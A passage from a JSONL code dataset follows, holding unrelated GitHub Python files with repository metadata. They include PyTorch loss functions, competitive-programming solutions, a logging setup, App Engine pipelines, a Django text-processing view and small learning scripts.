feat_dim))\n\n def forward(self, feat: torch.Tensor, label: torch.Tensor) -> torch.Tensor:\n batch_size = feat.size()[0]\n expanded_centers = self.centers.index_select(dim=0, index=label)\n intra_distances = feat.dist(expanded_centers)\n loss = (self.lambda_c / 2.0 / batch_size) * intra_distances\n return loss\n\n\nclass ContrastiveCenterLoss(nn.Module):\n def __init__(self, feat_dim: int, num_classes: int, lambda_c: float = 1.0):\n super(ContrastiveCenterLoss, self).__init__()\n self.feat_dim = feat_dim\n self.num_classes = num_classes\n self.lambda_c = lambda_c\n self.centers = nn.Parameter(torch.randn(num_classes, feat_dim))\n\n # may not work due to flowing gradient. change center calculation to exp moving avg may work.\n def forward(self, feat: torch.Tensor, label: torch.Tensor) -> torch.Tensor:\n batch_size = feat.size()[0]\n expanded_centers = self.centers.expand(batch_size, -1, -1)\n expanded_feat = feat.expand(self.num_classes, -1, -1).transpose(1, 0)\n distance_centers = (expanded_feat - expanded_centers).pow(2).sum(dim=-1)\n distances_same = distance_centers.gather(1, label.unsqueeze(1))\n intra_distances = distances_same.sum()\n inter_distances = distance_centers.sum().sub(intra_distances)\n epsilon = 1e-6\n loss = (self.lambda_c / 2.0 / batch_size) * intra_distances / (inter_distances + epsilon) / 0.1\n\n return loss\n\n\nclass CrossEntropyLoss_ContrastiveCenterLoss(nn.Module):\n def __init__(self, feat_dim: int, num_classes: int, lambda_c: float = 1.0):\n super(CrossEntropyLoss_ContrastiveCenterLoss, self).__init__()\n self.cc_loss = ContrastiveCenterLoss(feat_dim, num_classes, lambda_c)\n self.ce_loss = CELoss()\n\n def forward(self, feat: torch.Tensor, label: torch.Tensor) -> torch.Tensor:\n logits = feat[0]\n feat_fusion = feat[1]\n\n ce_loss = self.ce_loss(logits, label)\n cc_loss = self.cc_loss(feat_fusion, label)\n total_loss = ce_loss + cc_loss\n return total_loss\n\n\nclass CrossEntropyLoss_CenterLoss(nn.Module):\n def __init__(self, feat_dim: int, num_classes: int, lambda_c: float = 1.0):\n super(CrossEntropyLoss_CenterLoss, self).__init__()\n self.c_loss = CenterLoss(feat_dim, num_classes, lambda_c)\n self.ce_loss = CELoss()\n\n def forward(self, feat: torch.Tensor, label: torch.Tensor) -> torch.Tensor:\n logits = feat[0]\n feat_fusion = feat[1]\n\n ce_loss = self.ce_loss(logits, label)\n c_loss = self.c_loss(feat_fusion, label)\n total_loss = ce_loss + c_loss\n return total_loss\n\n\nclass ContrastiveCenterLossSER(ContrastiveCenterLoss):\n def forward(self, feat: torch.Tensor, label: torch.Tensor) -> torch.Tensor:\n feat_fusion = feat[1]\n loss = super().forward(feat_fusion, label)\n return loss\n\n\nclass CenterLossSER(CenterLoss):\n def forward(self, feat: torch.Tensor, label: torch.Tensor) -> torch.Tensor:\n feat_fusion = feat[1]\n loss = super().forward(feat_fusion, label)\n return loss\n\n\nclass CombinedMarginLoss(nn.Module):\n def __init__(\n self,\n in_features: int,\n out_features: int,\n s: float,\n m1: float,\n m2: float,\n m3: float,\n ):\n \"\"\"Combined margin loss for SphereFace, CosFace, ArcFace\n\n Args:\n in_features (int): the size of feature vector\n out_features (int): the number of classes\n s (float): scale factor\n m1 (float): margin for SphereFace\n m2 (float): margin for ArcFace, m1 must be 1.0\n m3 (float): margin for CosFace, m1 must be 1.0\n \"\"\"\n super(CombinedMarginLoss, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.s = s\n self.m1 = m1\n self.m2 = m2\n self.m3 = m3\n\n self.weight = torch.nn.Parameter(torch.normal(0, 0.01, (out_features, in_features)))\n\n # For ArcFace\n self.cos_m = math.cos(self.m2)\n self.sin_m = math.sin(self.m2)\n self.theta = math.cos(math.pi - self.m2)\n self.sinmm = math.sin(math.pi - self.m2) * self.m2\n self.easy_margin = False\n\n # CrossEntropyLoss\n self.ce_loss = CELoss()\n\n def forward(self, embbedings: torch.Tensor, labels: torch.Tensor) -> torch.Tensor:\n weight = self.weight\n norm_embeddings = normalize(embbedings)\n norm_weight_activated = normalize(weight)\n logits = linear(norm_embeddings, norm_weight_activated)\n logits = logits.clamp(-1, 1)\n\n index_positive = torch.where(labels != -1)[0]\n target_logit = logits[index_positive, labels[index_positive].view(-1)]\n\n if self.m1 == 1.0 and self.m3 == 0.0:\n with torch.no_grad():\n target_logit.arccos_()\n logits.arccos_()\n final_target_logit = target_logit + self.m2\n logits[index_positive, labels[index_positive].view(-1)] = final_target_logit\n logits.cos_()\n logits = logits * self.s\n\n elif self.m3 > 0:\n final_target_logit = target_logit - self.m3\n logits[index_positive, labels[index_positive].view(-1)] = final_target_logit\n logits = logits * self.s\n else:\n raise ValueError(\"Unsupported margin values.\")\n\n loss = self.ce_loss(logits, labels)\n return loss, logits\n\n\nclass FocalLoss(nn.Module):\n def __init__(self, gamma: float = 0.0, alpha: float = None, size_average: bool = True):\n super(FocalLoss, self).__init__()\n self.gamma = gamma\n self.alpha = alpha\n if isinstance(alpha, (float, int)):\n self.alpha = torch.Tensor([alpha, 1 - alpha])\n if isinstance(alpha, list):\n self.alpha = torch.Tensor(alpha)\n self.size_average = size_average\n\n def forward(self, input: torch.Tensor, target: torch.Tensor) -> torch.Tensor:\n input = input[0]\n if input.dim() > 2:\n input = input.view(input.size(0), input.size(1), -1) # N,C,H,W => N,C,H*W\n input = input.transpose(1, 2) # N,C,H*W => N,H*W,C\n input = input.contiguous().view(-1, input.size(2)) # N,H*W,C => N*H*W,C\n target = target.view(-1, 1)\n\n logpt = F.log_softmax(input)\n logpt = logpt.gather(1, target)\n logpt = logpt.view(-1)\n pt = Variable(logpt.data.exp())\n\n if self.alpha is not None:\n if self.alpha.type() != input.data.type():\n self.alpha = self.alpha.type_as(input.data)\n at = self.alpha.gather(0, target.data.view(-1))\n logpt = logpt * Variable(at)\n\n loss = -1 * (1 - pt) ** self.gamma * logpt\n if self.size_average:\n return loss.mean()\n else:\n return loss.sum()\n","repo_name":"namphuongtran9196/3m-ser","sub_path":"src/models/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":7862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39806578986","text":"scores = {}\r\nfor _ in range(int(input())):\r\n score, name = input().split()\r\n scores[name] = int(score)\r\n\r\nfor _ in range(int(input())):\r\n p1, p2, res = input().split()\r\n res = int(res)\r\n \r\n if res == 0:\r\n sp1, sp2 = 0.5, 0.5\r\n elif res == 1:\r\n sp1, sp2 = 1, 0\r\n elif res == 2:\r\n sp1, sp2 = 0, 1\r\n \r\n dp1 = 15 * (sp1 - 1 / (1 + pow(10, (scores[p2] - scores[p1]) / 400)))\r\n dp2 = 15 * (sp2 - 1 / (1 + pow(10, (scores[p1] - scores[p2]) / 400)))\r\n\r\n scores[p1] = max(int(scores[p1] + dp1), 0)\r\n scores[p2] = max(int(scores[p2] + dp2), 0)\r\n\r\nfor name, score in sorted(scores.items(), key=lambda x: (-x[1], x[0])):\r\n print(score, name)","repo_name":"juwkim/boj","sub_path":"백준/Bronze/29677. ШАШКА/ШАШКА.py","file_name":"ШАШКА.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"36514745292","text":"import traceback\nfrom logging.config import dictConfig\nfrom pathlib import Path\n\nfrom colorlog import ColoredFormatter\n\nimport settings\n\n__all__ = [\"setup_logging\"]\n\nLOGS_TO_SUPPRESS = tuple()\nROOT = Path(__file__).parent.parent\nTRACEBACK_ANALYSE_LIMIT = 20\n\n\nclass LogFormatter(ColoredFormatter):\n \"\"\"Formatter that adds extra logging info.\"\"\"\n\n @staticmethod\n def _extract_exc_location(exc_tb):\n \"\"\"Lookup traceback for the lowest line of source code.\n\n Provide extra context if a line is found within the limit.\n \"\"\"\n local_code_frame = None\n local_code_path = None\n\n for frame in traceback.extract_tb(exc_tb, limit=TRACEBACK_ANALYSE_LIMIT):\n frame_path = Path(frame.filename)\n if ROOT not in frame_path.parents:\n break\n local_code_frame, local_code_path = frame, frame_path\n\n if not local_code_frame:\n return {}\n\n module = local_code_path.relative_to(ROOT)\n return {\n \"location\": \".\".join(module.parts[:-1] + (module.stem, local_code_frame.name)),\n \"line\": repr(local_code_frame.line),\n }\n\n\ndef setup_logging(name: str = settings.LOGGER_NAME, full_log_file_name: str = settings.LOGS_FILE_NAME_PATH):\n \"\"\"Set up the logging.\"\"\"\n log_level = \"INFO\"\n config = {\n \"version\": 1,\n \"disable_existing_loggers\": False,\n \"formatters\": {\n \"default\": {\n \"()\": LogFormatter,\n \"fmt\": f\"%(log_color)s %(asctime)s %(levelname)s [%(name)s] %(message)s %(reset)s\",\n \"datefmt\": \"%Y-%m-%d %H:%M:%S\",\n \"log_colors\": {\n \"DEBUG\": \"cyan\",\n \"INFO\": \"green\",\n \"WARNING\": \"yellow\",\n \"ERROR\": \"red\",\n \"CRITICAL\": \"red\",\n },\n }\n },\n \"handlers\": {\n \"default\": {\"class\": \"logging.StreamHandler\", \"level\": log_level, \"formatter\": \"default\"},\n \"file\": {\n \"class\": \"logging.handlers.TimedRotatingFileHandler\",\n \"level\": log_level,\n \"formatter\": \"default\",\n \"filename\": full_log_file_name,\n \"encoding\": \"utf-8\",\n \"backupCount\": settings.env.BACKUP_LOGS_AMOUNT,\n \"interval\": settings.env.DAYS_TILL_NEW_LOG_FILE,\n \"when\": \"midnight\",\n },\n },\n \"loggers\": {name: {\"level\": log_level}, **{k: {\"level\": \"WARNING\"} for k in LOGS_TO_SUPPRESS}},\n \"root\": {\"level\": log_level, \"handlers\": [\"default\", \"file\"]},\n }\n dictConfig(config)\n","repo_name":"devProdigy/scam_finder","sub_path":"app/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42102219540","text":"# baekjoon - [15683]감시 (2020-10-15)\n# https://www.acmicpc.net/problem/15683\nfrom pprint import pprint\nimport sys\nsys.stdin = open(\"baekjoon/[15683]감시.txt\",'r')\n\ndef solution(y, x, num) :\n global blind\n dy = [-1, 0, 1, 0]\n dx = [0, 1, 0, -1]\n\n cctv = {\n 1 : [[0], [1], [2], [3]],\n 2 : [[0,2], [1,3]],\n 3 : [[0,1], [1,2], [2,3], [3,0]],\n 4 : [[0,1,2], [1,2,3], [2,3,0], [3,0,1]],\n 5 : [[0,1,2,3]]\n }\n cam = [[] for _ in range(len(cctv[num]))]\n view = [[] for _ in range(len(cctv[num]))]\n max_val = 0\n\n for i in range(len(cctv[num])):\n cnt = 0\n for j in cctv[num][i] : # 수정\n p = 1\n while(True) :\n ny = y + dy[j] * p\n nx = x + dx[j] * p\n p += 1\n\n # print((ny,nx))\n if 0 <= ny < N and 0 <= nx < M :\n if mat[ny][nx] == 6 :\n break\n elif mat[ny][nx] == 0 :\n cam[i].append((ny,nx))\n cnt += 1\n else :\n break\n\n\n view[i].append(cnt)\n \n max_val = view.index(max(view))\n for c in cam[max_val] :\n ny, nx = c\n mat[ny][nx] = -1\n \n blind -= max(view)[0]\n\n\n\nT = int(input())\nfor t in range(1, T+1):\n N, M = map(int, input().split())\n mat = [list(map(int, input().split())) for _ in range(N)]\n visited = [[False for _ in range(M)] for _ in range(N)]\n blind = 0\n \n\n for i in range(N):\n for j in range(M):\n if mat[i][j] == 0 :\n blind += 1\n\n for i in range(N):\n for j in range(M) :\n if mat[i][j] == 6 :\n visited[i][j] = True\n elif 1 <= mat[i][j] <= 5 :\n visited[i][j] = True\n solution(i, j, mat[i][j]) # cctv 위치\n\n if t == 18 :\n pprint(mat)\n print(blind)\n \n\n","repo_name":"DailyCodingMem/DailyCoding","sub_path":"zjohn99/baekjoon/[15683]감시.py","file_name":"[15683]감시.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"35300793878","text":"# #list comprehension\n# #new_list = [do_something_to_each_item_in_list for item in list]\n# #one line of code to do something to each item in list to make a new list \n\n# numbers = [1, 2, 3]\n# new_numbers = [n + 1 for n in numbers]\n# print(new_numbers)\n\n# #each letter in the name is a separate string in a list\n# name = \"angela\"\n# new_letters = [letter for letter in name]\n# print(new_letters)\n\n# new_range = [n*2 for n in range(1,5)]\n# print(new_range)\n\n# #conditional list comprehension\n# #new_list = [new_item for item in list if test]\n\n# names = [\"Alex\", \"Carissa\", \"Beth\"]\n# short_names = [name for name in names if len(name) < 5]\n# print(short_names)\n\n# uppercase_long_names = [name.upper() for name in names if len(name) > 5]\n# print(uppercase_long_names)\n\n# #dictionary comprehension\n# #new_dict = {new_key:new_value for item in list}\n# #new_dict = {new_key:new_value for (key,value) in dict.items() if test}\n# import random\n# #give random score to each name in list, put in dictionary\n# names = [\"Alex\", \"Carissa\", \"Beth\"]\n# student_scores = {student:random.randint(1, 100) for student in names}\n# print(student_scores)\n\n# passed_students = {student:score for (student,score) in student_scores.items() if score >= 80}\n# print(passed_students)\n\n# #iterate over pandas dataframe\nimport pandas\n\nstudent_dict = {\n \"student\": [\"Angela\", \"James\", \"Lily\"],\n \"score\": [56, 76, 98]\n}\n\nstudent_data_frame = pandas.DataFrame(student_dict)\nprint(student_data_frame)\n\n#loop through data frame\n#rows, each student, each score\nfor (index, row) in student_data_frame.iterrows():\n if row.student == \"Angela\":\n print(row.score)\n\n# new_dictionary = {new_key:new_value} for (index, row) in df.itterows()}","repo_name":"carissa406/100-days-of-code","sub_path":"Day 26/notes.py","file_name":"notes.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"11157080929","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport mpl_toolkits.mplot3d as Axes3D\nimport pandas as pd\n\nobservations = 1000\n##two variable method F(x,x2) = ax+bx2+C\n##create the inputs of two randomly generated sets and combine them using column stack\nxs = np.random.uniform(low=-10, high=10, size=(observations,1))\nzs = np.random.uniform(-10,10,(observations,1))\n\ninputs = np.column_stack((xs,zs))\n\n##Create Targets\n##targets have noise to model real data\nnoise = np.random.uniform(-1,1,(observations,1))\n\n##create the targets\ntargets = 2*xs -3*zs + 5 + noise\n\n#Plot the training data\n# targets = targets.reshape(observations,)\n# fig = plt.figure()\n# ax = fig.add_subplot(111,projection='3d')\n# ax.plot(xs,zs,targets)\n# ax.set_xlabel('xs')\n# ax.set_ylabel('zs')\n# ax.set_zlabel('Targets')\n# ax.view_init(azim=100)\n# # plt.show()\n# targets=targets.reshape(observations,1)\n\n#initialize weights\ninit_range = 0.1\nweights = np.random.uniform(-init_range, init_range, size=(2,1))\nbiases = np.random.uniform(-init_range, init_range, size=1)\nlearning_rate = 0.02\n\nfor i in range(100):\n outputs = np.dot(inputs, weights) + biases ##calculates the outs for comparison\n deltas = outputs - targets ##determines the loss difference between the outputs and the targets\n loss=np.sum(deltas**2)/ 2 / observations ##Determines to loss of our function(we attempt to minimize this)\n # print(loss)\n deltas_scaled=deltas/observations ##Scale the deltas for each operation\n weights = weights-learning_rate*np.dot(inputs.T,deltas_scaled) #Adjust the weights according to the opimization formula\n biases = biases - learning_rate*np.sum(deltas_scaled)##adjust the biases according to the optimization formula\n\n# print(weights)\n# print(biases)\n# plt.plot(outputs,targets)\n# plt.xlabel('outputs')\n# plt.ylabel('targets')\n# # plt.show()\n","repo_name":"Tannerbraithwaite/ML-DSeg","sub_path":"NeuralNetworks.py","file_name":"NeuralNetworks.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"457527854","text":"from datetime import datetime\nfrom google.appengine.api import app_identity\nfrom google.appengine.api import taskqueue\nfrom mapreduce import base_handler\nfrom mapreduce import mapreduce_pipeline\nfrom todo.blueprints import app_user\nfrom todo.models.calendar import Calendar\nfrom todo.models.event import Event\n\n\nclass ExportPipeline(base_handler.PipelineBase):\n\n def run(self, *args, **kwargs):\n params = {\n 'entity_kind': 'todo.models.user.User',\n 'output_writer': {\n 'bucket_name': app_identity.get_default_gcs_bucket_name(),\n 'content_type': 'text/plain',\n },\n }\n yield mapreduce_pipeline.MapperPipeline(\n 'export',\n 'todo.pipelines.ExportPipeline.map',\n 'mapreduce.input_readers.DatastoreInputReader',\n 'mapreduce.output_writers.GoogleCloudStorageConsistentOutputWriter',\n params=params)\n\n @staticmethod\n def map(user):\n tag = '\"%s\"' % user.get_hash()\n days = (datetime.now() - user.created).days\n\n calendars = 0\n todos = 0\n completed = 0\n for calendar in Calendar.get_all(user.key):\n calendars += 1\n for event in Event.get_all(calendar.key):\n todos += 1\n if event.done:\n completed += 1\n\n row = (tag, days, calendars, todos, completed)\n row = [str(col) for col in row]\n yield (','.join(row) + '\\n')\n\nclass SyncPipeline(base_handler.PipelineBase):\n\n def run(self, *args, **kwargs):\n params = {\n 'entity_kind': 'todo.models.user.User',\n }\n yield mapreduce_pipeline.MapperPipeline(\n 'sync',\n 'todo.pipelines.SyncPipeline.map',\n 'mapreduce.input_readers.DatastoreInputReader',\n params=params)\n\n @staticmethod\n def map(user):\n task_url = '/api/v1/queues/sync/user'\n params = {\n 'user_id': user.key.urlsafe()\n }\n\n try:\n if user.synced is not None:\n taskqueue.add(url=task_url, params=params)\n except AttributeError:\n pass\n\nclass IndexPipeline():\n\n @staticmethod\n def map(user):\n user.index()\n\n","repo_name":"slackpad/hashtagtodo","sub_path":"todo/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"76"} +{"seq_id":"19598900728","text":"# 청소년 상어\nimport sys\nimport copy\nIn = sys.stdin.readline\nsys.setrecursionlimit(10**6)\n'''\n== direction ==\n↑, ↖, ←, ↙, ↓, ↘, →, ↗\n1, 2, 3, 4, 5, 6, 7, 8\n\n== numbering ==\nblank : -1\nshark : 0\n'''\n\ndirect = [\n [-1, 0],\n [-1, -1],\n [0, -1],\n [1, -1],\n [1, 0],\n [1, 1],\n [0, 1],\n [-1, 1]\n]\n\nanswer = 0\n\n\ndef rotate(fishes, num):\n if fishes[num][0] < 8:\n fishes[num][0] += 1\n else:\n fishes[num][0] = 1\n\n\ndef fish_moving(fishes, spaces, die):\n for i in range(1, 17):\n if i in die:\n continue\n\n direction = fishes[i][0]\n pos_x, pos_y = fishes[i][1]\n dx, dy = direct[direction-1]\n new_x, new_y = pos_x + dx, pos_y + dy\n\n while True:\n if 0 <= new_x < 4 and 0 <= new_y < 4 and spaces[new_x][new_y] != 0:\n break\n\n rotate(fishes, i)\n direction = fishes[i][0]\n dx, dy = direct[direction-1]\n new_x, new_y = pos_x + dx, pos_y + dy\n\n if 0 <= new_x < 4 and 0 <= new_y < 4 and spaces[new_x][new_y] != 0:\n if spaces[new_x][new_y] != -1:\n fish = spaces[new_x][new_y]\n fishes[fish][1] = [pos_x, pos_y]\n fishes[i][1] = [new_x, new_y]\n spaces[new_x][new_y] = i\n spaces[pos_x][pos_y] = fish\n else:\n fishes[i][1] = [new_x, new_y]\n spaces[new_x][new_y] = i\n spaces[pos_x][pos_y] = -1\n\n\ndef recursion(fishes, spaces, die, ans):\n global answer\n\n fish_moving(fishes, spaces, die)\n\n spos_x, spos_y = fishes[0][1]\n sdirection = fishes[0][0]\n dx, dy = direct[sdirection-1]\n snew_x, snew_y = spos_x+dx, spos_y+dy\n moving = []\n\n while True:\n if snew_x < 0 or 4 <= snew_x or snew_y < 0 or 4 <= snew_y:\n break\n\n if spaces[snew_x][snew_y] != -1:\n moving.append([snew_x, snew_y])\n\n snew_x, snew_y = snew_x+dx, snew_y+dy\n\n if not moving:\n answer = max(answer, ans)\n return\n\n for item in moving:\n n_spaces = copy.deepcopy(spaces)\n n_fishes = copy.deepcopy(fishes)\n n_die = copy.deepcopy(die)\n\n snew_x, snew_y = item\n eating = spaces[snew_x][snew_y]\n n_die.append(eating)\n new_ans = ans + eating\n n_fishes[0] = fishes[eating]\n n_spaces[spos_x][spos_y] = -1\n n_spaces[snew_x][snew_y] = 0\n\n recursion(n_fishes, n_spaces, n_die, new_ans)\n\n\ndef main():\n global answer\n\n fishes = [0]*17\n spaces = [[0]*4 for _ in range(4)]\n die = []\n\n for i in range(4):\n sub = list(map(int, In().split()))\n for j in range(0, 7, 2):\n spaces[i][j//2] = sub[j]\n fishes[sub[j]] = [sub[j+1], [i, j//2]]\n\n ans = 0\n\n eating = spaces[0][0]\n die.append(eating)\n ans += eating\n fishes[0] = fishes[eating]\n spaces[0][0] = 0\n\n recursion(fishes, spaces, die, ans)\n print(answer)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"bn-tw2020/2020_winter_algorithm","sub_path":"participants/Geonil/problem_solving/week10/BOJ19236.py","file_name":"BOJ19236.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"33997741739","text":"#i have created project sonu vishwakarma\r\nfrom django.http import HttpResponse\r\nfrom django.shortcuts import render\r\n\r\ndef index(request):\r\n return render(request ,'index.html')\r\n\r\n\r\n# def index(request):\r\n#\r\n# return HttpResponse(\"

    sonu vishwakarma

    back\")\r\n #to give the link of any website\r\n #to give the link we use ''' dsfdsf'''\r\n # VISHWKARMA''')\r\ndef about(request):\r\n return HttpResponse(\" about hello sonu vishwkarma\"\r\n \"
    sonu
    vishwakarma
    \"\r\n \"sonu\"\r\n\r\n )\r\n\r\ndef home(request):\r\n return HttpResponse(\"this site is homeback\")\r\n\r\ndef contact(request):\r\n #get the text\r\n global params\r\n djtext = request.POST.get('text','default')\r\n Num = request.POST.get('name','default')\r\n fullcap = request.POST.get('uppercase','off')\r\n Error = request.POST.get('error','default')\r\n lenght = request.POST.get('lenghts','default')\r\n extraspace = request.POST.get('space','default')\r\n newlines = request.POST.get('newline','default')\r\n removepunc = request.POST.get('removepunc','off')# you can use off and default\r\n print(removepunc)\r\n analyzed = djtext\r\n num = Num\r\n if removepunc == \"on\":\r\n punctuations = '''!()-[]{};:'\"\\,c<>./?@#$%^&*_~'''\r\n\r\n analyzed = \"\"\r\n for char in djtext:\r\n if char not in punctuations:\r\n analyzed = analyzed + char\r\n\r\n params = {'purpose': 'MIND CODER', 'analyzed_text': analyzed}\r\n djtext =analyzed\r\n # analyzis the text\r\n # return HttpResponse(\"this is contact siteback\")\r\n # return render(request, 'analysis.html', params)\r\n if (fullcap == \"on\"):\r\n analyzed = \"\"\r\n for car in djtext:\r\n analyzed = analyzed + car.upper()\r\n params = {'purpose': 'uppercase', 'analyzed_text': analyzed}\r\n djtext = analyzed\r\n # return render(request, 'analysis.html', params)\r\n if (newlines == \"on\"):\r\n analyzed = \"\"\r\n for char in djtext:\r\n if char != \"\\n\" and char != \"/r\":\r\n analyzed = analyzed + char\r\n else:\r\n print(\"no\")\r\n print(\"pre\", analyzed)\r\n params = {'purpose': 'removed new lines', 'analyzed_text': analyzed}\r\n djtext= analyzed\r\n # return render(request, 'analysis.html', params)\r\n if (extraspace == \"on\"):\r\n analyzed = \"\"\r\n for index, char in enumerate(djtext):\r\n if not (djtext[index] == \" \" and djtext[index + 1] == \" \"):\r\n analyzed = analyzed + char\r\n params = {'purpose': 'space remove', 'analyzed_text': analyzed}\r\n djtext=analyzed\r\n # return render(request, 'analysis.html', params)\r\n if (lenght == \"on\"):\r\n\r\n leng = (len(analyzed))\r\n\r\n params = {'purpose': 'lenght of your text sir', 'analyzed_text': analyzed,'lenght':leng}\r\n djtext=analyzed\r\n # return render(request, 'analysis.html', params)\r\n # return HttpResponse(leng)\r\n\r\n if (removepunc != \"on\" and fullcap != \"on\" and newlines != \"on\" and extraspace != \"on\" and lenght!=\"on\"):\r\n return HttpResponse(\"please the any operation and try again sir\")\r\n return render(request, 'analysis.html', params)\r\n\r\n # else:\r\n # enter = Error\r\n # return HttpResponse(enter)\r\n\r\n\r\ndef link(request):\r\n return HttpResponse(\"this is link back\")","repo_name":"9588sonuvishwakarma/first","sub_path":"our/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3687,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"33885786700","text":"from pygame import mixer\nfrom datetime import datetime\nfrom time import time\ndef playmusic(music_name, text_to_stop):\n mixer.init()\n mixer.music.load(music_name)\n mixer.music.play()\n while True:\n a =input()\n if a == text_to_stop :\n mixer.music.stop()\n break\ndef text_log(text):\n with open(\"text_log.txt\", \"a\")as f :\n f.write(f\"{text} {datetime.now()}\\n\")\nif __name__ == '__main__':\n # playmusic(\"water.mp3\", \"stop\")\n water_time = time()\n eyes_time = time()\n excercise_time = time()\n water_duration = 60*40\n eyes_duration = 60*30\n excercise_duration = 60*35\n while True:\n if time() - water_time > water_duration:\n print(\"Time for Drinking water,Type 'drank' to off the Alarm\")\n playmusic(\"water.mp3\", \"drank\")\n water_time = time()\n text_log(\"Drank water at \")\n if time() - eyes_time > eyes_duration:\n print(\"Time for Eyes Excercise,Type 'stop' to off the Alarm\")\n playmusic(\"eyes.mp3\", \"stop\")\n eyes_time = time()\n text_log(\"Drank water at \")\n if time() - excercise_time > excercise_duration:\n print(\"Time for Physical Excercise,Type 'done' to off the Alarm\")\n playmusic(\"excercise.mp3\", \"done\")\n excercise_time = time()\n text_log(\"Drank water at \")\n\n\n\n\n","repo_name":"developer-akram/PythonPrograms-Basic_to_Advance-","sub_path":"class1/Health Excerise.py","file_name":"Health Excerise.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3929384564","text":"from rest_framework import status\nfrom rest_framework.test import APITransactionTestCase\nfrom app.models import Appointment, Customer, Job, Address\nfrom booking.models import Order\nfrom booking.serializers import SelectedProductSerializer\nfrom booking.tests.factories import SelectedProductFactory, SubmitBookingFormFactory\nfrom django.db.models import signals\n\n\nclass CustomerOrderTests(APITransactionTestCase):\n\n def test_submit_customer_order(self):\n signals.post_save.disconnect(\n sender=Customer, dispatch_uid=\"emit_identify_to_segment\")\n signals.post_save.disconnect(\n sender=Order, dispatch_uid=\"post_order_to_slack\")\n\n selected_product = SelectedProductFactory.create()\n post_data = SubmitBookingFormFactory.create(\n selected_product=SelectedProductSerializer(selected_product).data\n )\n\n response = self.client.post(\n \"/api/booking/customer_order/\", post_data, format=\"json\")\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n address = Address.objects.first()\n customer = Customer.objects.first()\n self.assertEqual(address.id, customer.address.id)\n\n job = Job.objects.first()\n appointment = Appointment.objects.first()\n self.assertEqual(job.appointment.id, appointment.id)\n self.assertEqual(job.customer.id, customer.id)\n\n last_job_note = job.job_notes.last()\n self.assertEqual(last_job_note.note,\n f\"GATE CODE: {customer.address.gate_code}\")\n\n order = Order.objects.first()\n self.assertEqual(order.customer.id, customer.id)\n self.assertEqual(order.appointment.id, appointment.id)\n","repo_name":"josesanchez111622/hb-backend","sub_path":"booking/tests/customer_order.py","file_name":"customer_order.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"43011001140","text":"from utils.kfac_utils import (ComputeCovA,\n ComputeCovG,\n ComputeCovA_proper,\n ComputeCovG_proper,\n StoreA,\n StoreG,\n StoreA_proper,\n StoreG_proper,\n rm_hooks)\n\nimport torch\nimport torch.optim as optim\nimport os\nimport json\nfrom tqdm import tqdm\nimport copy\nimport numpy as np\n\ndef get_timestamp_other():\n import time\n import datetime\n ts = time.time()\n # %f allows granularity at the micro second level!\n timestamp = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d_%H-%M-%S_%f')\n return timestamp\n\ndef mkdir(path):\n os.makedirs(path, exist_ok=True)\n\nclass dotdict(dict):\n \"\"\" dot.notation access to dictionary attributes \"\"\"\n __getattr__ = dict.get\n __setattr__ = dict.__setitem__\n __delattr__ = dict.__delitem__\n\ndef tensor_to_list(tensor):\n if len(tensor.shape) == 1:\n return [tensor[_].item() for _ in range(tensor.shape[0])]\n else:\n return [tensor_to_list(tensor[_]) for _ in range(tensor.shape[0])]\n\ndef save_tensor(tens, dump_dir, name):\n torch.save(tens, os.path.join(dump_dir, f'{name}.pt'))\n\ndef get_num_params(model):\n return sum([module.numel() for module in model.parameters()])\n\ndef dump_parameters(args):\n print(\"dumping parameters at \", args.dump_dir)\n with open(os.path.join(args.dump_dir, 'config.txt'), 'w') as outfile:\n if not (type(args) is dict or type(args) is dotdict):\n json.dump(vars(args), outfile, sort_keys=True, indent=4)\n else:\n json.dump(args, outfile, sort_keys=True, indent=4)\n\ndef save_final_model(args, model, optimizer, test_accuracies, dump_name='./kfac_dump', ckpt_type='final'):\n import time\n args.ckpt_type = ckpt_type\n time.sleep(1) # workaround for RuntimeError('Unknown Error -1') https://github.com/pytorch/pytorch/issues/10577\n curr_timestamp = get_timestamp_other()\n if not hasattr(args, 'dump_dir') or args.dump_dir is None:\n args.dump_dir = os.path.join(dump_name, curr_timestamp)\n mkdir(args.dump_dir)\n dump_parameters(args)\n torch.save({\n 'args': vars(args),\n 'epoch': args.epochs,\n 'test_accuracies': test_accuracies,\n 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict()\n }, os.path.join(args.dump_dir, 'final_model.pt')\n )\n print(\"Dumped model and optimizer and other meta info\")\n print(\"The path where it is saved is \", os.path.join(args.dump_dir, 'final_model.pt'))\n print(\"The args for this experiment were \", args)\n\ndef get_pretrained_model_optimizer(args, model, optimizer):\n\n assert args.load_model != ''\n if 